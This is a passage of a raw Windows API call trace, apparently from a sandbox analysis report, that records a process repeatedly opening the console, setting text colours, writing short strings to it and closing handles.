returned 0xcb [0160.419] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0160.420] GetLastError () returned 0xcb [0160.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.424] GetLastError () returned 0xcb [0160.428] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0160.428] GetLastError () returned 0xcb [0160.428] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.428] GetLastError () returned 0xcb [0160.432] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.467] GetLastError () returned 0xcb [0160.467] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.468] GetLastError () returned 0xcb [0160.468] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0160.468] GetLastError () returned 0xcb [0160.468] CloseHandle (hObject=0x2f) returned 1 [0160.468] GetLastError () returned 0xcb [0160.472] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.472] GetLastError () returned 0xcb [0160.472] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.473] GetLastError () returned 0xcb [0160.473] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0160.473] GetLastError () returned 0xcb [0160.473] CloseHandle (hObject=0x2f) returned 1 [0160.473] GetLastError () returned 0xcb [0160.477] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.477] GetLastError () returned 0xcb [0160.477] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.477] GetLastError () returned 0xcb [0160.477] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2df6928*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df6928*, lpNumberOfCharsWritten=0x601ee9c*=0x4f) returned 1 [0160.478] GetLastError () returned 0xcb [0160.478] CloseHandle (hObject=0x2f) returned 1 [0160.478] GetLastError () returned 0xcb [0160.481] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.482] GetLastError () returned 0xcb [0160.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.482] GetLastError () returned 0xcb [0160.482] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0160.482] GetLastError () returned 0xcb [0160.482] CloseHandle (hObject=0x2f) returned 1 [0160.482] GetLastError () returned 0xcb [0160.486] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.486] GetLastError () returned 0xcb [0160.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.486] GetLastError () returned 0xcb [0160.486] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0160.487] GetLastError () returned 0xcb [0160.487] CloseHandle (hObject=0x2f) returned 1 [0160.487] GetLastError () returned 0xcb [0160.490] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.491] GetLastError () returned 0xcb [0160.491] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.491] GetLastError () returned 0xcb [0160.491] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.491] GetLastError () returned 0xcb [0160.491] CloseHandle (hObject=0x2f) returned 1 [0160.491] GetLastError () returned 0xcb [0160.495] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0160.495] GetLastError () returned 0xcb [0160.495] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.496] GetLastError () returned 0xcb [0160.496] GetConsoleOutputCP () returned 0x1b5 [0160.496] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.496] GetLastError () returned 0xcb [0160.499] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0160.499] GetLastError () returned 0xcb [0160.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.500] GetLastError () returned 0xcb [0160.503] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0160.541] GetLastError () returned 0xcb [0160.541] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.541] GetLastError () returned 0xcb [0160.545] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.545] GetLastError () returned 0xcb [0160.546] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.546] GetLastError () returned 0xcb [0160.546] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0160.546] GetLastError () returned 0xcb [0160.546] CloseHandle (hObject=0x3b) returned 1 [0160.546] GetLastError () returned 0xcb [0160.550] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.550] GetLastError () returned 0xcb [0160.550] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.550] GetLastError () returned 0xcb [0160.551] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0160.551] GetLastError () returned 0xcb [0160.551] CloseHandle (hObject=0x3b) returned 1 [0160.551] GetLastError () returned 0xcb [0160.555] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.555] GetLastError () returned 0xcb [0160.555] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.555] GetLastError () returned 0xcb [0160.555] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2df6e58*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df6e58*, lpNumberOfCharsWritten=0x601ee9c*=0x3e) returned 1 [0160.555] GetLastError () returned 0xcb [0160.555] CloseHandle (hObject=0x3b) returned 1 [0160.556] GetLastError () returned 0xcb [0160.559] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.559] GetLastError () returned 0xcb [0160.559] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.560] GetLastError () returned 0xcb [0160.560] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0160.560] GetLastError () returned 0xcb [0160.560] CloseHandle (hObject=0x3b) returned 1 [0160.560] GetLastError () returned 0xcb [0160.563] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.564] GetLastError () returned 0xcb [0160.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.564] GetLastError () returned 0xcb [0160.564] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0160.564] GetLastError () returned 0xcb [0160.564] CloseHandle (hObject=0x3b) returned 1 [0160.564] GetLastError () returned 0xcb [0160.568] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.568] GetLastError () returned 0xcb [0160.568] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.568] GetLastError () returned 0xcb [0160.568] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.568] GetLastError () returned 0xcb [0160.568] CloseHandle (hObject=0x3b) returned 1 [0160.569] GetLastError () returned 0xcb [0160.572] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0160.572] GetLastError () returned 0xcb [0160.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.572] GetLastError () returned 0xcb [0160.572] GetConsoleOutputCP () returned 0x1b5 [0160.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.572] GetLastError () returned 0xcb [0160.576] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0160.576] GetLastError () returned 0xcb [0160.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.576] GetLastError () returned 0xcb [0160.579] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0160.618] GetLastError () returned 0xcb [0160.618] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.619] GetLastError () returned 0xcb [0160.623] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.624] GetLastError () returned 0xcb [0160.624] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.624] GetLastError () returned 0xcb [0160.624] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0160.624] GetLastError () returned 0xcb [0160.624] CloseHandle (hObject=0x47) returned 1 [0160.624] GetLastError () returned 0xcb [0160.628] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.629] GetLastError () returned 0xcb [0160.629] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.629] GetLastError () returned 0xcb [0160.629] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0160.630] GetLastError () returned 0xcb [0160.630] CloseHandle (hObject=0x47) returned 1 [0160.630] GetLastError () returned 0xcb [0160.634] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.634] GetLastError () returned 0xcb [0160.634] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.634] GetLastError () returned 0xcb [0160.634] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2df7270*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df7270*, lpNumberOfCharsWritten=0x601ee9c*=0x11) returned 1 [0160.634] GetLastError () returned 0xcb [0160.634] CloseHandle (hObject=0x47) returned 1 [0160.635] GetLastError () returned 0xcb [0160.638] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.638] GetLastError () returned 0xcb [0160.638] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.638] GetLastError () returned 0xcb [0160.638] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0160.639] GetLastError () returned 0xcb [0160.639] CloseHandle (hObject=0x47) returned 1 [0160.639] GetLastError () returned 0xcb [0160.643] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.643] GetLastError () returned 0xcb [0160.643] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.643] GetLastError () returned 0xcb [0160.643] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0160.643] GetLastError () returned 0xcb [0160.643] CloseHandle (hObject=0x47) returned 1 [0160.644] GetLastError () returned 0xcb [0160.647] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.647] GetLastError () returned 0xcb [0160.647] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.647] GetLastError () returned 0xcb [0160.647] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.648] GetLastError () returned 0xcb [0160.648] CloseHandle (hObject=0x47) returned 1 [0160.648] GetLastError () returned 0xcb [0160.652] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0160.652] GetLastError () returned 0xcb [0160.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.652] GetLastError () returned 0xcb [0160.652] GetConsoleOutputCP () returned 0x1b5 [0160.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.652] GetLastError () returned 0xcb [0160.656] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0160.695] GetLastError () returned 0xcb [0160.695] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.695] GetLastError () returned 0xcb [0160.699] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0160.699] GetLastError () returned 0xcb [0160.699] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.699] GetLastError () returned 0xcb [0160.703] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.703] GetLastError () returned 0xcb [0160.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.703] GetLastError () returned 0xcb [0160.703] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0160.703] GetLastError () returned 0xcb [0160.703] CloseHandle (hObject=0x53) returned 1 [0160.704] GetLastError () returned 0xcb [0160.707] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.708] GetLastError () returned 0xcb [0160.708] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.708] GetLastError () returned 0xcb [0160.708] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0160.709] GetLastError () returned 0xcb [0160.709] CloseHandle (hObject=0x53) returned 1 [0160.709] GetLastError () returned 0xcb [0160.713] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.713] GetLastError () returned 0xcb [0160.713] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.713] GetLastError () returned 0xcb [0160.713] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2df75e8*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df75e8*, lpNumberOfCharsWritten=0x601ee9c*=0x39) returned 1 [0160.714] GetLastError () returned 0xcb [0160.714] CloseHandle (hObject=0x53) returned 1 [0160.714] GetLastError () returned 0xcb [0160.717] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.718] GetLastError () returned 0xcb [0160.718] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.718] GetLastError () returned 0xcb [0160.718] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0160.718] GetLastError () returned 0xcb [0160.718] CloseHandle (hObject=0x53) returned 1 [0160.718] GetLastError () returned 0xcb [0160.722] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.723] GetLastError () returned 0xcb [0160.723] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.723] GetLastError () returned 0xcb [0160.723] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0160.723] GetLastError () returned 0xcb [0160.723] CloseHandle (hObject=0x53) returned 1 [0160.723] GetLastError () returned 0xcb [0160.727] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.727] GetLastError () returned 0xcb [0160.727] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.728] GetLastError () returned 0xcb [0160.728] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.728] GetLastError () returned 0xcb [0160.728] CloseHandle (hObject=0x53) returned 1 [0160.728] GetLastError () returned 0xcb [0160.732] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0160.769] GetLastError () returned 0xcb [0160.769] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.769] GetLastError () returned 0xcb [0160.769] GetConsoleOutputCP () returned 0x1b5 [0160.769] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.769] GetLastError () returned 0xcb [0160.773] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0160.773] GetLastError () returned 0xcb [0160.773] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.773] GetLastError () returned 0xcb [0160.777] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0160.777] GetLastError () returned 0xcb [0160.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.778] GetLastError () returned 0xcb [0160.781] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.781] GetLastError () returned 0xcb [0160.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.782] GetLastError () returned 0xcb [0160.782] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0160.782] GetLastError () returned 0xcb [0160.782] CloseHandle (hObject=0x5f) returned 1 [0160.782] GetLastError () returned 0xcb [0160.786] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.786] GetLastError () returned 0xcb [0160.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.786] GetLastError () returned 0xcb [0160.786] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0160.787] GetLastError () returned 0xcb [0160.787] CloseHandle (hObject=0x5f) returned 1 [0160.787] GetLastError () returned 0xcb [0160.791] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.791] GetLastError () returned 0xcb [0160.791] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.791] GetLastError () returned 0xcb [0160.791] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2df7ad4*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df7ad4*, lpNumberOfCharsWritten=0x601ee9c*=0x4f) returned 1 [0160.791] GetLastError () returned 0xcb [0160.792] CloseHandle (hObject=0x5f) returned 1 [0160.792] GetLastError () returned 0xcb [0160.796] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.796] GetLastError () returned 0xcb 